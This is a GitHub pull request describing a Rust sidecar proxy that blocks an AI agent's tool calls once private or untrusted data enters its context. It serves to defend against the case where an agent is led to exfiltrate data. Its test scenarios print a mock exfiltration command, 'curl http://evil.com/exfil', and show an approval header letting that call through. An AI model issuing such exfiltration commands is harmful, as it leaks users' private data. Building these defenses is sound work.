Skip to content

feat(capability-ratchet): add Rust capability ratchet sidecar#3

Open
ericksoa wants to merge 6 commits intoNVIDIA:mainfrom
ericksoa:feat/capability-ratchet-rust
Open

feat(capability-ratchet): add Rust capability ratchet sidecar#3
ericksoa wants to merge 6 commits intoNVIDIA:mainfrom
ericksoa:feat/capability-ratchet-rust

Conversation

@ericksoa
Copy link

@ericksoa ericksoa commented Mar 4, 2026

Problem

OpenShell already enforces strong perimeter security — Landlock filesystem isolation, process sandboxing, and network policies that restrict which binaries can reach which endpoints. These controls are effective at containing agents at the OS level.

However, perimeter controls alone can't reason about what data is in the agent's context at inference time. An agent that reads private data (email, calendar) and then asks the LLM for a tool call like curl http://evil.com/exfil?data=... would pass OpenShell's network policy as long as curl is an allowed binary. The exfiltration happens through the LLM's reasoning, not through a direct syscall bypass.

This is the confused deputy attack vector for agentic systems — and it requires a defense layer that operates at the inference request level, complementing OpenShell's existing OS-level controls.

Solution

A Capability Ratchet sidecar — a per-request, stateless HTTP proxy that adds defense-in-depth by sitting between the OpenShell sandbox proxy and the inference backend. It analyzes each request/response pair and blocks or rewrites tool calls that would violate the ratchet policy.

The ratchet is "one-way": once private or untrusted data enters the context, certain capabilities (network egress, arbitrary exec, irreversible exec) are revoked for that request. The agent can ask the user to approve blocked actions via the X-Ratchet-Approve header.

This complements OpenShell's existing protections — OpenShell handles the perimeter, the ratchet handles context-aware capability restriction.

Architecture

Capability Ratchet Architecture

End-to-End Test

The sidecar was verified end-to-end in Docker (colima) with three scenarios:

Build

docker build --build-arg BASE_IMAGE=openshell-base -t openshell-ratchet .

Test Setup

A container runs: bash-ast server → mock Python HTTP backend (port 9999) → Rust sidecar (port 4001). The mock backend returns a curl http://evil.com/exfil tool call whenever tool results are present in the request.

Test 1: Clean request passes through

curl -s http://127.0.0.1:4001/v1/chat/completions \
  -H "Content-Type: application/json" \
  -d '{"model":"test","messages":[{"role":"user","content":"hello"}]}'
# → {"choices":[{"message":{"role":"assistant","content":"Hello!"},...}]}

No taint detected → request and response pass through unmodified.

Test 2: Tainted request blocks exfiltration

curl -s http://127.0.0.1:4001/v1/chat/completions \
  -H "Content-Type: application/json" \
  -d '{"model":"test","messages":[
    {"role":"assistant","tool_calls":[{"id":"tc1","type":"function",
      "function":{"name":"read_email","arguments":"{}"}}]},
    {"role":"tool","tool_call_id":"tc1",
      "content":"From: boss@corp.com\nSubject: Confidential Q3 numbers"}
  ]}'
# → Response rewritten: tool call blocked, ratchet_metadata with approve instructions

The read_email tool produces has-private-data taint (per policy) → network:egress is forbidden → the LLM's curl tool call is blocked. The response includes ratchet_metadata.approve_value: "tc99" so the agent can ask the user for approval.

Test 3: User-approved request passes through

curl -s http://127.0.0.1:4001/v1/chat/completions \
  -H "Content-Type: application/json" \
  -H "X-Ratchet-Approve: tc99" \
  -d '{"model":"test","messages":[...same tainted messages...]}'
# → {"choices":[{"message":{"tool_calls":[{"function":{"name":"bash",
#     "arguments":"{\"command\":\"curl http://evil.com/exfil\"}"}}],...}}]}

X-Ratchet-Approve: tc99 header → tool call tc99 bypasses analysis → original response returned.

Contributor Notes

Tech Stack

Chosen to match OpenShell core: Axum 0.8, Tokio 1.43, Reqwest 0.12 (rustls), serde, tracing (JSON), Clap 4.5. Edition 2024, rust-version 1.88. Clippy pedantic + nursery.

Module Map

Module Purpose Lines
types.rs TaintFlag, Capability, Reversibility, ToolCall enums/structs 120
constants.rs SHELLS, NETWORK_COMMANDS, INTERPRETER_COMMANDS, NETWORK_CODE_INDICATORS 70
known_safe.rs 140+ built-in safe commands (from analysis of ~25k real agent sessions) 64
revocation.rs 2×2 taint→forbidden capability matrix 34
reversibility.rs AST command classification (git, docker, kubectl, interpreters, SQL) 510
config.rs SidecarConfig from YAML + env var resolution 118
policy.rs 4-step resolution: tools[cmd subcmd]tools[cmd]knownSafe → unknown 281
normalize.rs Chat Completions / Anthropic / Responses API normalization (enum dispatch) 607
bash_ast.rs NDJSON Unix socket client for bash-ast server 143
bash_unwrap.rs Recursive bash -c unwrapping via BoxFuture (max depth 5) 351
sandbox.rs unshare --net / sandbox-exec AST rewriting 144
taint.rs Per-request taint detection with shlex fallback 196
tool_analysis.rs Full analysis pipeline: capabilities, reversibility, URL extraction, sandboxing 381
proxy.rs Reqwest forwarding to backend (forces stream: false) 60
server.rs Axum router, approval parsing, response rewriting 417
main.rs Clap CLI, tracing init, startup 124

Key Design Decisions

  • Single crate (not workspace): ~3,500 lines total — workspace adds complexity for zero benefit
  • serde_json::Value throughout: The sidecar is format-agnostic and forward-compatible. Defining request/response structs would create rigidity.
  • Enum dispatch for normalize: All three format variants known at compile time. No vtable overhead.
  • BTreeSet for taint/capability sets: Deterministic ordering in logs and tests
  • Shared AppState via Arc: Standard Axum pattern for config + policy + HTTP client + bash-ast client

Testing

cargo test          # 44 unit + integration tests
cargo clippy        # pedantic + nursery (warnings only, no errors)

Docker

docker build --build-arg BASE_IMAGE=openshell-base -t openshell-ratchet .

Multi-stage build: rust:1.88-bookworm builder → base sandbox image. Single static binary at /usr/local/bin/capability-ratchet-sidecar.

Config Files (unchanged from prototype)

  • ratchet-config.yaml — upstream URL, API key env var, listen addr, bash-ast socket, shadow mode
  • ratchet-policy.yaml — tool taint declarations, capability requirements, approved endpoints
  • policy.yaml — OpenShell network policy (filesystem, process, network ACLs)

🤖 Generated with Claude Code

Add a per-request, stateless HTTP proxy sidecar that prevents AI agent
data exfiltration by dynamically revoking capabilities when private or
untrusted data enters the conversation context.

Implementation:
- Axum 0.8 HTTP server: /v1/chat/completions proxy + /health endpoint
- Taint detection from tool results (has-private-data, has-untrusted-input)
- 2x2 revocation matrix mapping taint flags to forbidden capabilities
- Three API format normalizers: Chat Completions, Anthropic, Responses API
- bash-ast Unix socket client for AST-based command analysis
- Recursive bash -c unwrapping with shlex fallback
- OS-level sandbox rewriting (unshare --net / sandbox-exec)
- Tool analysis pipeline: capability detection, reversibility, URL extraction
- User approval flow via X-Ratchet-Approve header
- Shadow mode for log-only deployment
- Multi-stage Docker build producing a single static binary
- 44 unit and integration tests

Tech stack matches NemoClaw core: Axum, Tokio, Reqwest, serde, tracing.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Aaron Erickson <aerickson@nvidia.com>
ericksoa and others added 5 commits March 13, 2026 07:15
Update all references across the repo from the old NemoClaw branding
to OpenShell, including Docker image names, CLI commands, config files,
documentation, and source code comments.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
- Fix all 38 clippy pedantic/nursery warnings (manual_let_else,
  missing_errors_doc, option_if_let_else, or_fun_call, too_many_lines,
  significant_drop_tightening, iter_on_single_items, unnecessary_wraps,
  type_complexity, needless_continue, missing_panics_doc, etc.)
- Run cargo fmt across all source files
- Fix shellcheck SC2034 warning (unused loop variable in ratchet-start.sh)
- Fix grammar: "A OpenShell" → "An OpenShell" in README
- Add #[allow(dead_code)] to unused test helper sample_config()
- Extract helpers to reduce function line counts (server.rs, normalize.rs)
- Use static defaults to avoid or_fun_call with temporary references

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
- Only force stream:false on tainted requests (non-tainted pass through)
- Add force_non_streaming parameter to forward_to_backend
- Add X-Ratchet-Stream-Blocked response header when streaming is disabled
- Document why the ratchet exists vs Docker --network=none
- Add honest Limitations section to README

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant